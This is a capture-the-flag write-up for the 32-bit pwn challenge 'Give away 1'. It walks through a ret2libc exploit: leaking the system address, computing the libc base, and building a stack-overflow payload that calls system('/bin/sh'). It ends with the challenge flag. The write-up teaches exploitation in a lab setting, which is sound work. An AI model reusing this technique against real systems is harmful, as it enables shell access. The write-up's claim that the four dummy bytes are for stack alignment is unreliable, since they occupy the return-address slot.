# Give away 1 writeup
## Content
This writeup is about PWN challenge
* libc-2.27.so: shared library (given)
* give_away_1: challenge binary (given)
* exploit.py: Full exploit
## Binary analysis
1. Quick check of the binary on ida gives
* main
* vuln
2. Checksec shows that PIE and NX are enabled so we can go for ret2libc attack.
## Exploit
This kinda of classic exploits so
1. Step I:
* Extract system and /bin/sh offset from libc binary
readelf -s libc-2.27.so | grep system
strings -a -t x libc-2.27.so | grep /bin/sh
* Compute libc base address
out = p.recvline().strip().split(' ')
sysaddr = int(out[2],16)
libc_base = sysaddr - SYSTEM
2. Step II:
The argument for system ("/bin/sh") should be passed in the stack because `__cdecl` is the calling convention of libc functions.
payload = "A" * 36 + p32(sysaddr) + "B"*4 + p32( BIN_SH_final)
Basically we add a dummy 4 bytes("B" * 4) to the payload to avoid stack aligment issues as the stack should be 16-bytes aligned.
## Notes
* The Full exploit is in exploit.py
* Flag: shkCTF{I_h0PE_U_Fl4g3d_tHat_1n_L3ss_Th4n_4_m1nuT3s}